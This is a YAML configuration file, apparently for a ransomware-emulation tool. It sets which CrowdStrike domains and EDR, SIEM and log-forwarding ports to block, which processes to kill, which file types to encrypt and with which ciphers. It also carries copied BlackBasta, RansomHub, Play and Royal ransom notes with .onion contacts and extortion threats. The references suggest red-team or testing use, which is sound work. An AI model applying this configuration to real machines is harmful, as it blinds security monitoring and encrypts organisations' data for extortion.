# go run github.com/abakum/embed-encrypt - When config updates, use this to regenerate necessary data.
unique_file_mutex: ef01acyti34Mt5rxZlOPfRtQez.qbwcsv  # Created at the root level of a drive to prevent re-encryption
fw_domain_rule_name: app_egress_dom_test # Name of the Windows Firewall rule to create if -blockhosts is passed
domain_blocks: # Attempt to stop resolution of these hostnames through hosts.etc if -blockhosts is passed
  - ts01-b.cloudsink.net # Start CrowdStrike
  - lfodown01-b.cloudsink.net
  - lfoup01-b.cloudsink.net
  - falcon.crowdstrike.com
  - assets.falcon.crowdstrike.com
  - assets-public.falcon.crowdstrike.com
  - api.crowdstrike.com
  - firehose.crowdstrike.com
  - ts01-gyr-maverick.cloudsink.net
  - lfodown01-gyr-maverick.cloudsink.net
  - lfoup01-gyr-maverick.cloudsink.net
  - falcon.us-2.crowdstrike.com
  - assets.falcon.us-2.crowdstrike.com
  - assets-public.us-2.falcon.crowdstrike.com
  - api.us-2.crowdstrike.com
  - firehose.us-2.crowdstrike.com
  - ts01-laggar-gcw.cloudsink.net
  - sensorproxy-laggar-g-524628337.us-gov-west-1.elb.amazonaws.com
  - lfodown01-laggar-gcw.cloudsink.net
  - ELB-Laggar-P-LFO-DOWNLOAD-1265997121.us-gov-west-1.elb.amazonaws.com
  - falcon.laggar.gcw.crowdstrike.com
  - laggar-falconui01-g-245478519.us-gov-west-1.elb.amazonaws.com
  - api.laggar.gcw.crowdstrike.com
  - firehose.laggar.gcw.crowdstrike.com
  - falconhose-laggar01-g-720386815.us-gov-west-1.elb.amazonaws.com
  - ts01-us-gov-2.cloudsink.net
  - lfodown01-us-gov-2.cloudsink.net
  - api.us-gov-2.crowdstrike.com
  - firehose.us-gov-2.crowdstrike.com
  - ts01-lanner-lion.cloudsink.net
  - lfodown01-lanner-lion.cloudsink.net
  - lfoup01-lanner-lion.cloudsink.net
  - assets.falcon.eu-1.crowdstrike.com
  - assets-public.falcon.eu-1.crowdstrike.com
  - api.eu-1.crowdstrike.com
  - firehose.eu-1.crowdstrike.com # End CrowdStrike
fw_rule_name: app_egress_test # Name of the Windows Firewall rule to create if -portblock is passed
port_blocks: # If -portblock is enabled, will add Windows Firewall rules (if enabled) to block all communication on these ports
  - 443 # Most EDR Agents communicate on 443
  - 80 # Some things (unfortunately) still use this
  - 4118 # TrendMicro [https://help.deepsecurity.trendmicro.com/10/0/Manage-Components/ports.html]
  - 4122 # TrendMicro [https://help.deepsecurity.trendmicro.com/10/0/Manage-Components/ports.html]
  - 514 # Commonly used for SIEM/SYSLOG
  - 6514 # Commonly used for SIEM/SYSLOG
  - 5985 # Windows Event Forwarding Server default port
  - 9997 # Splunk Universal Forwarder default Data port
  - 5044 # Elastic Agent -> LogStash default port
  - 9200 # Elastic Agent -> ElasticSearch default port
  - 8081 # Trellix [https://docs.trellix.com/bundle/trellix-agent-5.7.x-installation-guide/page/GUID-D972BD9A-CC34-4D5F-9CC6-0DCDE3CCA92E.html
  - 8082 # Trellix [https://docs.trellix.com/bundle/trellix-agent-5.7.x-installation-guide/page/GUID-D972BD9A-CC34-4D5F-9CC6-0DCDE3CCA92E.html
  - 8083 # Trellix [https://docs.trellix.com/bundle/trellix-agent-5.7.x-installation-guide/page/GUID-D972BD9A-CC34-4D5F-9CC6-0DCDE3CCA92E.html
  - 9090 # Prometheus [https://prometheus.io/docs/prometheus/latest/installation/#volumes-bind-mount
  - 41002 # CarbonBlack default (https://techdocs.broadcom.com/us/en/carbon-black/edr/carbon-black-edr/7-8-1/scm-guide-edr/GUID-3117FB54-5D0F-46C1-8372-BF3784D27CFF-en.html)
file_name_skips: # No matter what, will skip files containing these strings in the name - uses regex so be cautious of special characters
  - readme
  - bootmgr
  - OUT
  - NTUSER
file_extension_skips: # No matter what, will skip files with these extensions
  - .exe
  - .dll
  - .lnk
  - .sys
  - .msi
  - .bat
directory_skips: # No matter what, will skip directories containing these strings in the name - use lower-case, does not use regex
  - windows
  - tor browser
  - $recycle.bin
  - $windows.~ws
  - $windows.~bt
  - mozilla
  - google
  - application data
  - boot
  - local settings
process_kill_names: # If -kill flag, will attempt to stop these processes (if running) on target machine
  - "vmms.exe"
  - "msaccess.exe"
  - "mspub.exe"
  - "svchost.exe"
  - "vmcompute.exe"
  - "notepad.exe"
  - "ocautoupds.exe"
  - "ocomm.exe"
  - "ocssd.exe"
  - "oracle.exe"
  - "onenote.exe"
  - "outlook.exe"
  - "powerpnt.exe"
  - "explorer.exe"
  - "sql.exe"
  - "steam.exe"
  - "synctime.exe"
  - "vmwp.exe"
  - "thebat.exe"
  - "thunderbird.exe"
  - "visio.exe"
  - "winword.exe"
  - "wordpad.exe"
  - "xfssvccon.exe"
  - "teamviewer.exe"
  - "agntsvc.exe"
  - "dbsnmp.exe"
  - "dbeng50.exe"
  - "encsvc.exe"
file_extension_targets: # Will only target files with these extensions
  - .$er
  - .4dd
  - .4dl
  - .abcddb
  - .abs
  - .abx
  - .ac
  - .accdb
  - .accdc
  - .accde
  - .accdr
  - .accdt
  - .accdw
  - .accft
  - .adb
  - .ade
  - .adf
  - .adn
  - .adp
  - .alf
  - .anb
  - .aq
  - .arc
  - .ask
  - .bak
  - .bcp
  - .bdf
  - .bin
  - .btr
  - .cat
  - .cdb
  - .ckp
  - .cma
  - .cpd
  - .crypt
  - .crypt1
  - .crypt10
  - .crypt12
  - .crypt14
  - .crypt15
  - .crypt5
  - .crypt6
  - .crypt7
  - .crypt8
  - .crypt9
  - .csv
  - .dacpac
  - .dad
  - .daschema
  - .dat
  - .db
  - .db-shm
  - .db-wal
  - .db2
  - .db3
  - .dbc
  - .dbcrypt
  - .dbcrypt8
  - .dbf
  - .dbs
  - .dbt
  - .dbv
  - .dbx
  - .dcb
  - .dct
  - .dcx
  - .ddl
  - .dlis
  - .docx
  - .docm
  - .dp1
  - .dqy
  - .dsk
  - .dsn
  - .dtsx
  - .dxl
  - .eco
  - .ecx
  - .edb
  - .epim
  - .exb
  - .fcd
  - .fdb
  - .fic
  - .fm5
  - .fmp
  - .fmp12
  - .fmpsl
  - .fol
  - .fp3
  - .fp4
  - .fp5
  - .fp7
  - .fpt
  - .frm
  - .gdb
  - .grdb
  - .gwi
  - .hdb
  - .his
  - .hjt
  - .ib
  - .ibd
  - .icg
  - .icr
  - .idb
  - .ihx
  - .itdb
  - .itw
  - .jet
  - .jtx
  - .kdb
  - .kexi
  - .kexic
  - .kexis
  - .ldf
  - .lgc
  - .log1
  - .luminar
  - .lut
  - .lwx
  - .maf
  - .maq
  - .mar
  - .mas
  - .mav
  - .maw
  - .mdb
  - .mdf
  - .mdn
  - .mdt
  - .mpd
  - .mrg
  - .mud
  - .mwb
  - .myd
  - .myi
  - .ndf
  - .ns2
  - .ns3
  - .ns4
  - .nsf
  - .nv
  - .nv2
  - .nwdb
  - .nyf
  - .odb
  - .oqy
  - .ora
  - .orx
  - .owc
  - .pdf
  - .p96
  - .p97
  - .pan
  - .pdb
  - .pdm
  - .pnz
  - .qbw
  - .qry
  - .qvd
  - .rar
  - .rbf
  - .rctd
  - .rod
  - .rodx
  - .rpd
  - .rsd
  - .sav
  - .sbf
  - .scx
  - .sdb
  - .sdc
  - .sdf
  - .sdy
  - .sis
  - .spq
  - .sql
  - .sqlite
  - .sqlite3
  - .sqlitedb
  - .te
  - .temx
  - .tmd
  - .tps
  - .trc
  - .trm
  - .txt
  - .udb
  - .udl
  - .usr
  - .v12
  - .vis
  - .vpd
  - .vvv
  - .wdb
  - .wmdb
  - .wrk
  - .xdb
  - .xld
  - .xlsm
  - .xlsx
  - .xmlff
  - .zip
groups: # When using a named group, will randomly select an extension and note name to apply - can use %R to generate random alpha-numeric character in extension and note contents
  - group: BlackBasta
    extension_method: mutate
    extensions:
      - basta
      - '%R%R%R%R%R%R%R%R%R'
    cipher: xchacha20
    asym: rsa
    notes:
      - readme.txt
      - instructions_read_me.txt
    note_behavior: immediate
    references:
      - https://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-blackbasta
      - https://www.group-ib.com/resources/ransomware-notes/
    note: |
      ATTENTION!
      Your network has been breached and all data was encrypted.  Please contact us at:
      
      
      bastad5huzwkepdixedg2gekg7jk22ato24zyllp6lnjx7wdtyctgvyd.onion
      
      
      Login ID: %R%R%R%R%R%R%R%R-%R%R%R%R-%R%R%R%R-%R%R%R%R-%R%R%R%R%R%R%R%R%R%R%R%R
      
      *!* To access .onion website download and install Tor Browser at:
      
        https://www.torproject.org/ (Tor Browser is not related to us)
      
      *!* TO restore all your PCs and get your network working again, follow these instructions:
      
      - Any attempts to modify, decrypt or rename the files will lead to its fatal corruption.  It doesn't matter, who are 
      trying to do this, either it will be your IT guys or a recovery agency.
      
      Please follow these simple rules to avoid data corruption:
      
      - Do not modify, rename or delete files.  Any attempts to modify, decrypt ot rename the files will lead to its fatal corruption.
      
      - Do not hire a recovery company.  They can't decrypt without the key.
      They also don't care about your business.  They believe that they are good negotiators, but it is not.  
      They usually fail.  So speak for yourself.
      
      Waiting you in a chat.
  - group: RansomHub   # Technically RansomHub has been observed using ECC/ECDH for asym but we use RSA
    extension_method: append
    extensions:
      - '%R%R%R%R%R%R'
    cipher: aes256
    asym: ecc
    notes:
      - How To Restore Your Files.txt
      - README_%R%R%R%R%R.txt
    note_behavior: immediate
    references:
      - https://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-ransomhub
      - https://www.cisa.gov/sites/default/files/2024-09/aa24-242a-stopransomware-ransomhub-ransomware_1.pdf
      - https://www.darktrace.com/blog/ransomhub-ransomware-darktraces-investigation-of-the-newest-tool-in-shadowsyndicates-arsenal
      - https://www.group-ib.com/resources/ransomware-notes/
    note: |
      We are the RansomHub.
      Your company Servers are locked and Data has been taken to our servers. This is serious.
      
      Good news:
        - your server system and data will be restored by our Decryption Tool
        - for now, your data is secured and safely stored on our server
        - nobody in the world is aware about the data leak from your company except you and RansomHub team

      - Normal Browser Links: https://ransomxifxwc5eteopdobynonjctkxxvap77yqifu2emfbecgbqdw6qd.onion.ly/
      - Tor Browser Links: http://ransomxifxwc5eteopdobynonjctkxxvap77yqifu2emfbecgbqdw6qd.onion/
      
        Want to go to authorities for protection
      - Seeking their help will only make the situation worse,They will try to prevent you from negotiating with us, because the negotiations will make them look incompetent,After the incident report is handed over to the government department, you will be fined ,The government uses your fine to reward them.And you will not get anything, and except you and your company, the rest of the people will forget what happened
        Think you can handle it without us by decrypting your servers and data using some IT Solution from third-party "specialists"
      - they will only make significant damage to all of your data
        every encrypted file will be corrupted forever. Only our Decryption Tool will make decryption guaranteed
        Think your partner IT Recovery Company will do files restoration
      - no they will not do restoration, only take 3-4 weeks for nothing
        besides all of your data is on our servers and we can publish it at any time
        as well as send the info about the data breach from your company servers to your key partners and clients, competitors, media and youtubers, etc.
        Those actions from our side towards your company will have irreversible negative consequences for your business reputation.
        You don't care in any case, because you just don't want to pay
      - We will make you business stop forever by using all of our experience to make your partners, clients, employees and whoever cooperates with your company change their minds by having no choice but to stay away from your company.
        As a result, in midterm you will have to close your business.
        So lets get straight to the point.
      
      What do we offer in exchange on your payment:
        - decryption and restoration of all your systems and data within 24 hours with guarantee
        - never inform anyone about the data breach out from your company
        - after data decryption and system restoration, we will delete all of your data from your servers forever
        - provide valuable advising on your company IT protection so no one can attack your again.
      
      Now, in order to start negotiations, you need to do the following:
        - install and run 'Tor Browser' from https://www.torproject.org/download/
        - use 'Tor Browser' open http://sdhipwlqmxv7k4wgrrvhjfwpwapa3uxudtl5otkm757q5jyvl7gk5nqd.onion/
        - enter your Client ID: %R%R%R%R%R-%R%R%R-%R%R%R-%R%R%R%R%R
        There will be no bad news for your company after successful negotiations for both sides. But there will be plenty of those bad news if case of failed negotiations, so don't think about how to avoid it.
      Just focus on negotiations, payment and decryption to make all of your problems solved by our specialists within 1 day after payment received: servers and data restored, everything will work good as new.
        ************************************************

  - group: Play
    extension_method: append
    extensions:
      - PLAY
      - play
    cipher: aes256
    asym: rsa
    notes:
      - ReadMe.txt
    note_behavior: immediate
    references:
      - https://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-play
      - https://www.fortinet.com/blog/threat-research/ransomware-roundup-play-ransomware
      - https://www.group-ib.com/resources/ransomware-notes/
    note: |
      PLAY
      news portal, tor network links:
      mbrlkbtq5jonaqkurjwmxftytyn2ethqvbxfu4rgjbkkknndqwae6byd.onion
      k7kg3jqxang3wh7hnmaiokchk7qoebupfgoik6rha6mjpzwupwtj25yd.onion
      %R%R%R%R%R%R%R%R%R%R%R%R%R%R%R%R@gmx.com
  - group: Royal
    extension_method: append
    extensions:
      - royal
    cipher: aes256
    asym: rsa
    notes:
      - README.txt
    note_behavior: immediate
    references:
      - https://www.cybereason.com/blog/royal-ransomware-analysis
    note: |
      Hello!
      
      If you are reading this, it means that your system were hit by Royal ransomware.
      Please csontact us via:
      royal2xthig3ou5hd7zsliqagy6yygk2cdelaxtni2fyad6dpmpxedid.onion
      
      In the meantime, let us explain this case. It may seem complicated, but it is not!
      Most likely what happened was that you decided to save some money on your security infrastructure.
      Alas, as a result your critical data was not only encrypted but also copied from your system on a secure server.
      From there it can be published online. Then anyone on the internet from darknet criminals, ACLU journalists, Chinese government(different names for the same thing),
      and even your employees will be able to see your internal documentation: personal data, HR reviews, internal lawsuits and complaints, financial reports, accounting, intellectual property and more!
      
      Fortunately we got you covered!
      
      Royal offers you a unique deal. For a modest royalty (got it; got it ?) for our pentesting services we will not only provide you with an amazing risk mitigation service,
      covering you from reputational, legal, financial and insurance risks, but will also provide you with a security review for your systems.
      
      To put it simply, your files will be decrypted, your data restored and kept confidential, and your systems will stay in safe.
      
      Contact us through TOR browser using the link:
      royal2xthig3ou5hd7zsliqagy6yygk2cdelaxtni2fyad6dpmpxedid.onion
    
